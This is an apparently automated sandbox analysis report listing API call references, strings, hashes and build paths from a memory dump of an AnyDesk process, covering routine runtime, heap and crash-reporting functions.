                                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 69C430CA
                                                                                                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 69C43145
                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 69C431B9
                                                                                                                                                                                                                                                  • ___DestructExceptionObject.LIBVCRUNTIME ref: 69C4323E
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 69C43279
                                                                                                                                                                                                                                                  • ___DestructExceptionObject.LIBVCRUNTIME ref: 69C432EA
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 69C43302
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 69C4330A
                                                                                                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 69C43316
                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 69C43321
                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FrameFramesMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 1230517499-393685449
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 69C57F2D
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598D0
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598E2
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598F4
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59906
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59918
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5992A
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5993C
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5994E
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59960
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59972
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59984
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59996
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C599A8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F22
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F44
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F59
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F64
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F86
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F99
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FA7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FB2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FEA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FF1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5800E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C58026
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: a4826c6d6b67bd7721ba1a9d83b75279a22d4d514fc33aa0821889554e451b1e
                                                                                                                                                                                                                                                  • Instruction ID: 2106a267954ef79babeb10b5e12ba84cbf7bb9cc795f8693df8bcbcf5044c1e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4826c6d6b67bd7721ba1a9d83b75279a22d4d514fc33aa0821889554e451b1e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06314E31604B019FEB21DA38F844F9673E9BF40714F10D519E49AD71A0FF31A9A89764
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Smanip$Current$CountProcessThreadTick
                                                                                                                                                                                                                                                  • String ID: )] $UNKNOWN$VERBOSE
                                                                                                                                                                                                                                                  • API String ID: 1623629380-3915483136
                                                                                                                                                                                                                                                  • Opcode ID: ba98b9a16dde5bd4cf87a9896cd7e94da36cbde1c41811f4d56f25bcd4f77724
                                                                                                                                                                                                                                                  • Instruction ID: db9d401375cc1bddb14007bffec7197e5add0a49bb5de6b951973be580f5d748
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba98b9a16dde5bd4cf87a9896cd7e94da36cbde1c41811f4d56f25bcd4f77724
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DA1FEB5A04300AFD724DF64EC55F1ABBE5BF85708F048829F9898B291FB31D505CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C31CCF
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 69C31CFD
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C31D4A
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 69C31D72
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 69C31E06
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 69C31E19
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?), ref: 69C31EDE
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 69C31F31
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?), ref: 69C31FBF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCloseHandleReleaseValue$CurrentThread
                                                                                                                                                                                                                                                  • String ID: Failed to TlsSetValue().$c:\b\build\slave\win\build\src\base\threading\thread_local_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3870014289-1575462531
                                                                                                                                                                                                                                                  • Opcode ID: 7b910b6ad2f7e5807ec24e1a3fc45678bc580abe2019a7a0dc67c1bf612c0051
                                                                                                                                                                                                                                                  • Instruction ID: f054ac1df49494483968b8dbe51271d2a96736843d45851dbb19dc364d1bc5f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b910b6ad2f7e5807ec24e1a3fc45678bc580abe2019a7a0dc67c1bf612c0051
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03815475908354AFDB00DF64EC85BCA77E8BF55314F408829FD998B181FB70A649CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 77137fb85bc1237dffa6ba337794c5b711a5dd78753399fa1ea8cee5ccd44897
                                                                                                                                                                                                                                                  • Instruction ID: 4eb12924d2701b10ff46feb4ec15dd662379442ad3b152805d9a33fd9d280399
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77137fb85bc1237dffa6ba337794c5b711a5dd78753399fa1ea8cee5ccd44897
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAC177B6E40204AFEB20DBA8DC82FDE77F9EB45744F444165FA05FB281F6709A608764
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66AB6: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C66AEE
                                                                                                                                                                                                                                                    • Part of subcall function 69C66AB6: GetLastError.KERNEL32 ref: 69C66B07
                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 69C652F7
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 69C65310
                                                                                                                                                                                                                                                    • Part of subcall function 69C22340: GetLastError.KERNEL32(?,00000000), ref: 69C223D6
                                                                                                                                                                                                                                                    • Part of subcall function 69C66663: GetLastError.KERNEL32(?,000000FF,0000001C,00000001), ref: 69C666A2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$File$Pointer
                                                                                                                                                                                                                                                  • String ID: expected to start with $DAPC$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc$failed to rewind to write$failed to truncate$failed to write header$failed to write records$failed to write string table
                                                                                                                                                                                                                                                  • API String ID: 4162258135-419746783
                                                                                                                                                                                                                                                  • Opcode ID: fe1071f7c03a3a82caca408ac861fcbd56a83d2a1efcfa52cda1c5ff2a880811
                                                                                                                                                                                                                                                  • Instruction ID: db3f972027df764e666156ab2bd71f300ac2b4336c9c505b4f7c2687e9bacf88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe1071f7c03a3a82caca408ac861fcbd56a83d2a1efcfa52cda1c5ff2a880811
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA10475940308AAEB18DB64FC95FEDB379AF04318F209099E508BB1D2FF71AA45CB10
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: SVWj
                                                                                                                                                                                                                                                  • API String ID: 0-3360714375
                                                                                                                                                                                                                                                  • Opcode ID: 2aedc68cbdc9d45f04a7853b484659a91c7c4cef2259388f1b358b7a7f46808e
                                                                                                                                                                                                                                                  • Instruction ID: 7720cd1074fe7c1fd577a4719d5cccbc7a6c06d911a4c2e6610eae73b0bbd03d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aedc68cbdc9d45f04a7853b484659a91c7c4cef2259388f1b358b7a7f46808e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0312936A009148FD714DF64F69095E73B4EF40368B5085AADC059B291F731EA42DBE2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,69C6763E,000000FF,?,?), ref: 69C67814
                                                                                                                                                                                                                                                    • Part of subcall function 69C67928: OutputDebugStringW.KERNEL32(69C7EDD8,?,69C67900,Failed to create directory %ls, last error is %d,?,000000B7), ref: 69C67949
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • install_static::`anonymous-namespace'::RecursiveDirectoryCreate, xrefs: 69C6781C
                                                                                                                                                                                                                                                  • Failed to create directory %ls, last error is %d, xrefs: 69C678F6
                                                                                                                                                                                                                                                  • %hs( %ls directory conflicts with an existing file. ), xrefs: 69C67839
                                                                                                                                                                                                                                                  • %hs( %ls directory exists ), xrefs: 69C67825
                                                                                                                                                                                                                                                  • Failed to create one of the parent directories, xrefs: 69C678BF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesDebugFileOutputString
                                                                                                                                                                                                                                                  • String ID: %hs( %ls directory conflicts with an existing file. )$%hs( %ls directory exists )$Failed to create directory %ls, last error is %d$Failed to create one of the parent directories$install_static::`anonymous-namespace'::RecursiveDirectoryCreate
                                                                                                                                                                                                                                                  • API String ID: 708965821-2569357656
                                                                                                                                                                                                                                                  • Opcode ID: 88436eb92a2fdcbc2866be51c0b296f8a2eebd15e5415008dd800a2139b8db03
                                                                                                                                                                                                                                                  • Instruction ID: ea14809b6cd946ecb61db1a948c69751b38c00500b6986fab0288345b3b560de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88436eb92a2fdcbc2866be51c0b296f8a2eebd15e5415008dd800a2139b8db03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E331F434904304ABDF00DAA5FCD5FAE77B8AF47338F605A19E528A71E0FB345906D661
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3D54D
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetCurrentProcess.KERNEL32(00000000), ref: 69C32A4E
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 69C32A64
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetProcAddress.KERNEL32(00000000), ref: 69C32A6B
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetVersionExW.KERNEL32(0000011C), ref: 69C32AE0
                                                                                                                                                                                                                                                    • Part of subcall function 69C32A20: GetNativeSystemInfo.KERNEL32(?), ref: 69C32B3C
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 69C3D5B7
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeProcThreadAttributeList), ref: 69C3D5CB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UpdateProcThreadAttribute), ref: 69C3D5D8
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DeleteProcThreadAttributeList), ref: 69C3D5E5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • DeleteProcThreadAttributeList, xrefs: 69C3D5DA
                                                                                                                                                                                                                                                  • InitializeProcThreadAttributeList, xrefs: 69C3D5C5
                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 69C3D5B2
                                                                                                                                                                                                                                                  • UpdateProcThreadAttribute, xrefs: 69C3D5CD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule$CurrentInfoNativeProcessSystemVersion
                                                                                                                                                                                                                                                  • String ID: DeleteProcThreadAttributeList$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4189602493-1491343547
                                                                                                                                                                                                                                                  • Opcode ID: 5ca2af53a3d7b4cef546b81d4a1ac9e116bfa1d01bf10a820b0353755d38b8e6
                                                                                                                                                                                                                                                  • Instruction ID: 11e71bda930b512f61b12353007d38a8b7510ba42f3b4ec629c9b4837032ab70
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca2af53a3d7b4cef546b81d4a1ac9e116bfa1d01bf10a820b0353755d38b8e6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511E6B5A063609BEF10DB64AD5076A3EF4ABC7329F90043EE50597240F7784845C7A6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAA4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAB0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FABB
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAC6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAD1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FADC
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAE7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAF2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FAFD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FB0B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                   • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
